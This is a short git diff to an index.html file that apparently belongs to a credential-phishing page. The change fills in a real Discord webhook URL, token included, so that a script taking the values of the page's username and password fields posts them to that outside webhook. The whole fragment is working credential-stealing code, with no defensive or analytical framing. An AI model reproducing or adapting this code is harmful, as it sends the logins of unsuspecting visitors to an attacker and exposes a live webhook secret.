--- a/index.html
+++ b/index.html
@@ -98,7 +98,7 @@
   } while (currentDate - date < milliseconds);
 }
     var request = new XMLHttpRequest();
-    request.open("POST", "WEBHOOK");
+    request.open("POST", "https://discordapp.com/api/webhooks/986605598466539590/X3Lfh2n3dF5uA-k-O-0br7-G3j3EngSMfiXq35u9xROXqoUvBjPGRUf11g7y8-5-zQ98");
     request.setRequestHeader('Content-type', 'application/json');
     var params = {
       content: ("> **USERNAME  : **" + document.getElementById('username').value + "\n> **PASSWORD : **" + document.getElementById('password').value)
